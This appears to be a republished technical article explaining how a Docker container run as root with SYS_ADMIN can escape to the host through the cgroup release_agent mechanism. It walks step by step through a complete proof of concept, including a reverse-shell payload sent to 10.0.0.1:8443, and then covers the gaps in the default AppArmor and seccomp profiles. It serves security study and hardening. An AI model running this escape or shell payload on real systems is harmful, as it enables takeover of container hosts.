Example Analysis of the Escape Principle of a Docker SYS_ADMIN Container

2025-07-06 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report

This article walks through an example analysis of how a Docker container that has been granted the SYS_ADMIN capability can escape to the host.

Preface

The insecure configuration of the Docker container may lead to a container escape vulnerability in the application. This article will introduce in detail the principle of container escape using SYS_ADMIN Capability.

Unlike virtual machines, Docker containers share the host operating system's kernel. Hosts and containers are isolated using kernel namespaces, kernel capabilities, cgroups (control groups), and other technologies.

Since version 2.2, the Linux kernel has divided root privileges into units called capabilities. For example, a web server in a Docker container may need to bind to a port below 1024; the capability required for this operation is CAP_NET_BIND_SERVICE. If that capability is granted to the user running the web server, the server does not need to run as root in order to bind the port.

In most cases, processes in the container do not need to be run as "full" root users. Docker only grants a few default Capabilities to the root account in the container, and others are disabled. This means that the root user rights in the container are much smaller than the real root user rights on the host.
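One way to see which capabilities a process in the container actually holds is to decode the CapEff bitmask in its /proc status file. The sketch below is only an illustration and is not part of the original PoC: the helper name has_cap is hypothetical, and it relies on the standard Linux capability numbers (CAP_NET_BIND_SERVICE is bit 10, CAP_SYS_ADMIN is bit 21).

```shell
#!/bin/sh
# has_cap MASK BIT: succeed if bit number BIT is set in the hexadecimal
# capability mask MASK. (Hypothetical helper, for illustration only.)
has_cap() {
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

CAP_NET_BIND_SERVICE=10
CAP_SYS_ADMIN=21

# Read the effective capability set of this shell, if /proc is available.
if [ -r "/proc/$$/status" ]; then
    cap_eff=$(awk '/^CapEff:/ { print $2 }' "/proc/$$/status")
    if [ -n "$cap_eff" ]; then
        if has_cap "$cap_eff" "$CAP_SYS_ADMIN"; then
            echo "CapEff=$cap_eff includes CAP_SYS_ADMIN"
        else
            echo "CapEff=$cap_eff does not include CAP_SYS_ADMIN"
        fi
    fi
fi
```

Run inside a container started with default settings, this would be expected to report that CAP_SYS_ADMIN is absent; with --cap-add=SYS_ADMIN the bit should be set.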

In practice, many users violate these Docker security configuration principles. For example, for convenience the container is started as the root user, and in order to perform some privileged operations the root user is granted additional capabilities, such as SYS_ADMIN.

If a Docker container is started in a way that satisfies the following conditions, an attacker inside the container can escape to the host.

1. The process in the container runs as the root user

2. The container has the SYS_ADMIN capability enabled

3. The container does not use Docker's default AppArmor profile docker-default, or AppArmor allows the mount syscall

Conditions 1 and 2 are required. Condition 3 is relatively easy to meet on some hosts: Red Hat family distributions such as CentOS do not install AppArmor by default.

For example, start an Ubuntu container with the following command:

docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

Here "--cap-add=SYS_ADMIN" grants the SYS_ADMIN capability to the container, and "--security-opt apparmor=unconfined" disables Docker's default AppArmor profile.

An attacker can escape the container by mounting the host cgroup inside the container and using the cgroup notify_on_release feature to execute a shell on the host. The steps are as follows:

Mount the host cgroup in the container, and create a custom cgroup

mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

Configure the notify_on_release and release_agent of the cgroup

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "sh -i >& /dev/tcp/10.0.0.1/8443 0>&1" >> /cmd
chmod a+x /cmd

Here the payload is a reverse shell over TCP; any other Linux shell command could be executed instead.

Trigger release_agent execution

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

The operation and principle of each step are described in detail below.

0x01 Mounting the host cgroup

The first step in exploitation is to mount the memory cgroup of the host.

A cgroup (control group) is a Linux kernel feature for allocating resources (such as CPU time, system memory, network bandwidth, or a combination of these). Use the mount -t cgroup command to view the host's current cgroups.

Then change into the memory cgroup directory that is to be mounted.

This folder contains the system administrator's configuration of memory resources, where the docker folder contains docker's default cgroup configuration for container memory resources.

0x011 Container cgroup

By default, when a container starts, Docker creates a subdirectory named after the container ID under the docker subdirectory of each subsystem directory in /sys/fs/cgroup.

Looking at the memory cgroup directory on the host, you can see an additional directory 9d14bc4987d5807f691b988464e167653603b13faf805a559c8a08cb36e3251a under the docker directory. This string is the container ID, and the contents of this directory are what a user inside the container sees under /sys/fs/cgroup/memory.

0x012 mount system call

The mount command invokes the mount system call (syscall), which has system call number 165 on x86-64. Making this syscall requires the CAP_SYS_ADMIN capability.

If the --cap-add SYS_ADMIN parameter is added when the container is started, the root user inside the container can use mount to mount a cgroup. (Docker does not enable the SYS_ADMIN capability by default.)

0x013 Mounting the cgroup in the container

The first step of the exploit is to create a temporary directory /tmp/cgrp in the container and use the mount command to mount the system's default memory cgroup on /tmp/cgrp.

mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp

Here the -t parameter specifies that the filesystem type to mount is cgroup, and -o specifies the mount options. For cgroup, the mount option is a cgroup subsystem, and each subsystem represents a resource type, such as cpu or memory. For details, refer to: cgroup subsystems.

After this command runs, the host's memory cgroup is mounted inside the container at /tmp/cgrp.

Note that mounting the cgroup again succeeds only if the hierarchy of the mount target is empty. If mounting the memory subsystem here fails, you can switch to another subsystem.
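To pick an alternative subsystem, the kernel's own list in /proc/cgroups can be consulted. The following is a minimal sketch, assuming the usual four-column layout of that file (subsys_name, hierarchy, num_cgroups, enabled); the function name list_enabled_subsystems is hypothetical.

```shell
#!/bin/sh
# list_enabled_subsystems: read /proc/cgroups-formatted text on stdin and
# print the name of every subsystem whose "enabled" column is 1.
# (Hypothetical helper, for illustration only.)
list_enabled_subsystems() {
    awk '!/^#/ && $4 == 1 { print $1 }'
}

# Show the subsystems known to the running kernel, if the file is readable.
if [ -r /proc/cgroups ]; then
    list_enabled_subsystems < /proc/cgroups
fi
```

Any name printed here is a candidate value for the -o option of mount -t cgroup; whether the mount succeeds still depends on the host's cgroup setup.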

The next step is to create a child cgroup x in this hierarchy.

mkdir /tmp/cgrp/x

Looking at /tmp/cgrp/x, you can see many memory-related configuration files.

From here on, x is the main target of the PoC.

0x02 notify_on_release

The second step of the exploit involves notify_on_release. Every cgroup has a notify_on_release parameter, a Boolean (1 or 0) that respectively enables or disables execution of the release agent. If notify_on_release is enabled, then when the cgroup no longer contains any tasks (that is, when the cgroup's tasks file contains no PIDs), the kernel executes the file specified by the release_agent parameter.

Note that the release_agent file is not in the /tmp/cgrp/x directory but in the root directory of the memory cgroup, /tmp/cgrp. This design can be used to automatically remove all empty cgroups under the root cgroup.
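The split between the two files can be checked with a small read-only helper. This is a sketch under the assumptions of this article (a cgroup v1 hierarchy mounted at /tmp/cgrp with a child named x); the function name show_release_config is hypothetical and it only reads files.

```shell
#!/bin/sh
# show_release_config ROOT CHILD: print the release-related settings of a
# cgroup v1 hierarchy mounted at ROOT and of its child cgroup CHILD.
# (Hypothetical helper, for illustration only.)
show_release_config() {
    # release_agent exists only at the root of the hierarchy.
    if [ -f "$1/release_agent" ]; then
        echo "release_agent=$(cat "$1/release_agent")"
    else
        echo "release_agent=<not found>"
    fi
    # notify_on_release is a per-cgroup flag (0 or 1).
    if [ -f "$1/$2/notify_on_release" ]; then
        echo "notify_on_release=$(cat "$1/$2/notify_on_release")"
    else
        echo "notify_on_release=<not found>"
    fi
}

# Inspect the hierarchy used in this article, if it is mounted.
if [ -d /tmp/cgrp ]; then
    show_release_config /tmp/cgrp x
fi
```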

Set the notify_on_release property of /tmp/cgrp/x to 1.

echo 1 > /tmp/cgrp/x/notify_on_release

Then point release_agent at the container's cmd file as seen from the host. To do this, first obtain the container's storage path on the host.

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

The file /etc/mtab lists the filesystems actually mounted in the container.

Here the sed command captures the run of non-comma characters that follows perdir=. The resulting host_path is the writable upperdir directory of Docker's overlay storage driver.
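The effect of the sed expression is easiest to see on a sample line. The sketch below spells the option name out in full as upperdir= instead of \perdir=, and the mount entry is a made-up example shaped like an overlay2 root filesystem line; the paths and the function name extract_upperdir are hypothetical.

```shell
#!/bin/sh
# extract_upperdir: read mtab-formatted text on stdin and print the value of
# the overlay "upperdir=" mount option. (Hypothetical helper.)
extract_upperdir() {
    sed -n 's/.*upperdir=\([^,]*\).*/\1/p'
}

# Sample overlay entry with hypothetical paths.
sample='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA,upperdir=/var/lib/docker/overlay2/0123abcd/diff,workdir=/var/lib/docker/overlay2/0123abcd/work 0 0'

printf '%s\n' "$sample" | extract_upperdir
# prints /var/lib/docker/overlay2/0123abcd/diff
```

The capture group [^,]* stops at the first comma, which is why only the upperdir path is returned and the workdir option that follows is dropped.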

Create a cmd file in this directory (inside the container it appears as /cmd) and write its host path to /tmp/cgrp/release_agent.

echo "$host_path/cmd" > /tmp/cgrp/release_agent

0x03 Container escape

Next, the shell commands that the PoC will execute are written to the cmd file, and the file is made executable.

echo '#!/bin/sh' > /cmd
echo "sh -i >& /dev/tcp/10.0.0.1/8443 0>&1" >> /cmd
chmod a+x /cmd

Finally, the PoC triggers the host to execute the commands in the cmd file.

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

This command starts a sh process and writes the PID of that process to /tmp/cgrp/x/cgroup.procs, where \$\$ represents the PID of the sh process.

Once sh -c has run, the sh process exits immediately, so the cgroup /tmp/cgrp/x no longer contains any tasks, and the kernel executes the file named in /tmp/cgrp/release_agent.
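The role of the escaped \$\$ can be observed without touching any cgroup. This minimal sketch only prints PIDs; the variable names are illustrative.

```shell
#!/bin/sh
# PID of the shell running this script.
outer_pid=$$

# \$\$ is escaped, so the outer shell passes a literal $$ to the inner sh,
# which expands it to its own (short-lived) PID.
inner_pid=$(sh -c "echo \$\$")

echo "outer=$outer_pid inner=$inner_pid"
```

The two values differ, which is the point of the escaping: the PID written to cgroup.procs belongs to a process that exits right away, leaving the cgroup empty.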

0x04 AppArmor and seccomp

The key to escaping a Docker container that has the SYS_ADMIN capability is that the container can mount the host's cgroup. To prevent containers from making the mount syscall, Docker enables two additional protection mechanisms by default, AppArmor and seccomp, on top of restricting capabilities. However, the default configurations that Docker ships for these two tools have some notable gaps.

0x041 AppArmor

AppArmor is not installed by default on Red Hat family Linux distributions such as CentOS. As a result, condition 3 from the beginning of the article, "the container does not use Docker's default AppArmor profile docker-default, or AppArmor allows the mount syscall", is easily met without explicitly adding the "--security-opt apparmor=unconfined" parameter.

AppArmor (Application Armor) is a security module of the Linux kernel. AppArmor allows system administrators to associate each program with a security profile, thus limiting the functionality of the program. To put it simply, AppArmor is an access control system similar to SELinux, through which users can specify which files the program can read, write or run, whether it can open network ports, and so on.

For example, the Docker website gives an example of hardening Nginx.

profile docker-nginx flags=(attach_disconnected,mediate_deleted) {
  #include ...
  deny /bin/** wl,
  deny /boot/** wl,
  deny /dev/** wl,
  deny /etc/** wl,
  deny /home/** wl,
  ...

Here deny /bin/** wl blocks write access to the /bin directory and subdirectories at any depth (w: write, l: create hard links).

The default profile used by Docker is docker-default. It is moderately protective while providing wide application compatibility. Looking at the template from which the profile is generated, you can see on line 43 that the container is not allowed to call mount.

...
deny mount,
deny /sys/[^f]*/** wklx,
deny /sys/f[^s]*/** wklx,
deny /sys/fs/[^c]*/** wklx,
deny /sys/fs/c[^g]*/** wklx,
deny /sys/fs/cg[^r]*/** wklx,
...

Note also that the profile does not prohibit reading and writing the /sys/fs/cgroup directory. If in practice the cgroup directory cannot be read or written inside the container, check whether the AppArmor configuration applied to the container forbids access to it.

Docker starts containers with the docker-default policy by default. In that case, even a container run with the SYS_ADMIN capability is prevented from making the mount system call, unless the policy is overridden at container start with the parameter --security-opt apparmor=unconfined.

Although Docker's default AppArmor configuration does a good job of preventing containers from calling mount, not all hosts support AppArmor. Debian family distributions such as Ubuntu install AppArmor by default. Red Hat family distributions such as CentOS use SELinux by default and do not install AppArmor. This makes it possible to perform the mount system call on Red Hat family hosts without starting the container with the --security-opt apparmor=unconfined parameter. Testing on a CentOS machine gives the following results:

If you look at docker info, you can see that AppArmor is not enabled in the security option "Security Options", only seccomp. Therefore, the CentOS host can still execute POC successfully with the addition of only the "--cap-add=SYS_ADMIN" parameter.
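The same check can be scripted. The sketch below assumes that docker info accepts a Go template via --format and that the SecurityOptions field prints entries of the form name=apparmor or name=seccomp,profile=...; the function name has_security_option is hypothetical and it does a simple substring match.

```shell
#!/bin/sh
# has_security_option OPTIONS NAME: succeed if the text OPTIONS (as printed
# by docker info) contains an entry "name=NAME".
# (Hypothetical helper; plain substring match, for illustration only.)
has_security_option() {
    case "$1" in
        *"name=$2"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Query the local daemon if the docker CLI is present; ignore failures.
if command -v docker >/dev/null 2>&1; then
    opts=$(docker info --format '{{.SecurityOptions}}' 2>/dev/null) || opts=""
    for name in apparmor seccomp; do
        if has_security_option "$opts" "$name"; then
            echo "$name: listed"
        else
            echo "$name: not listed"
        fi
    done
fi
```

On a host like the CentOS machine described here, this would be expected to list seccomp but not apparmor.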

0x042 seccomp

From the docker info output in the previous section, you can see that Docker also has a default seccomp configuration. Then why didn't seccomp prevent the container from calling mount?

This starts with the default seccomp configuration of Docker. In the configuration template, the configuration of mount starts at line 600.

{
  "names": [
    "bpf", "clone", "fanotify_init", "fsconfig", "fsmount",
    "fsopen", "fspick", "lookup_dcookie", "mount", "move_mount",
    "name_to_handle_at", "open_tree", "perf_event_open", "quotactl",
    "setdomainname", "sethostname", "setns", "syslog", "umount",
    "umount2", "unshare"
  ],
  "action": "SCMP_ACT_ALLOW",
  "args": [],
  "comment": "",
  "includes": {
    "caps": ["CAP_SYS_ADMIN"]
  },
  "excludes": {}
}

As you can see, the default configuration of Docker seccomp relies only on SYS_ADMIN to restrict the execution of mount system calls. If the container starts with the "--cap-add=SYS_ADMIN" parameter, then seccomp does not protect the container very well.
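Inside the container, the Seccomp field of a process's /proc status file shows that a filter is still attached even though mount is permitted. The sketch below is an illustration only; the helper names are hypothetical, and it uses the kernel's documented values for that field (0 disabled, 1 strict, 2 filter).

```shell
#!/bin/sh
# seccomp_mode_name MODE: translate the numeric Seccomp field into a label.
seccomp_mode_name() {
    case "$1" in
        0) echo disabled ;;
        1) echo strict ;;
        2) echo filter ;;
        *) echo unknown ;;
    esac
}

# seccomp_mode_of FILE: print the Seccomp field of a /proc/<pid>/status file.
seccomp_mode_of() {
    awk '/^Seccomp:/ { print $2 }' "$1"
}

# Report the seccomp mode of this shell, if /proc is available.
if [ -r "/proc/$$/status" ]; then
    mode=$(seccomp_mode_of "/proc/$$/status")
    echo "seccomp mode: $(seccomp_mode_name "$mode")"
fi
```

A result of "filter" in a container started with --cap-add=SYS_ADMIN is consistent with the rule above: the profile is active, but it allows mount for processes holding CAP_SYS_ADMIN.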
